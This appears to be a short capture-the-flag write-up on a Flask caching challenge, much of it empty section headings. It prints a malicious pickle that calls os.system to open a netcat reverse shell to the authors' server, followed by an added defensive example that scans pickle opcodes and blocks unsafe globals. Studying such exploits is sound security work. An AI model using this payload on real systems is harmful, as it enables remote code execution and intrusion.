CTF Flask Caching

Introduction

Code Analysis and Observed Behavior of Application

The Exploit

Funnily enough, after trying multiple different nonfunctional payloads, our answer was found within the OFFICIAL Python 3 documentation on pickles. That documentation shows how a pretty compact-looking pickle lets us import the os module and execute a shell command through it. Below is a form of this pickle that has been crafted to connect to a DO Droplet:

pickle

!cos
system
(S'nc REDACTED-IP 6969 -e /bin/sh'
tR.

One question that we had while crafting this pickle was whether or not the challenge was intended to be solved in such a way and if there was a better approach than this one. Nevertheless, a shell is always a nice thing to have :)
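Seen from the defending side, the pickle above works through two opcodes: a global import (`c`) and a call (`R`). The following added example, which is not part of the original writeup, lists those opcodes without executing anything and then refuses the import with an allowlisting unpickler; `scan_pickle`, `safe_loads`, `ALLOWED` and the harmless sample command are assumptions made for illustration.

```python
import io
import pickle
import pickletools

# Constructed sample: same opcode layout as the pickle above, harmless command.
SAMPLE = b"cos\nsystem\n(S'echo constructed-sample'\ntR."

# Opcodes that import a global, and opcodes that call or build with one.
IMPORT_OPS = {"GLOBAL", "STACK_GLOBAL", "INST"}
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}

# Assumption: the only globals this hypothetical application needs to load.
ALLOWED = {("builtins", "set"), ("builtins", "frozenset")}


def scan_pickle(data):
    """Walk the opcode stream without executing it; return (imports, calls)."""
    imports, calls = [], []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in IMPORT_OPS:
            # GLOBAL/INST carry "module name"; STACK_GLOBAL takes both from the stack.
            imports.append(arg if arg is not None else "<names on stack>")
        if op.name in CALL_OPS:
            calls.append(op.name)
    return imports, calls


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not on the allowlist."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    print(scan_pickle(SAMPLE))        # static view, nothing is executed
    print(safe_loads(pickle.dumps({"a": [1, 2]})))   # plain data still loads
    try:
        safe_loads(SAMPLE)
    except pickle.UnpicklingError as exc:
        print("rejected:", exc)
```

An allowlist only narrows what a pickle can reach; a cache or session store that attackers can write to is better served by a data-only format such as JSON.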

Gaining Shell Access and Finding the Flag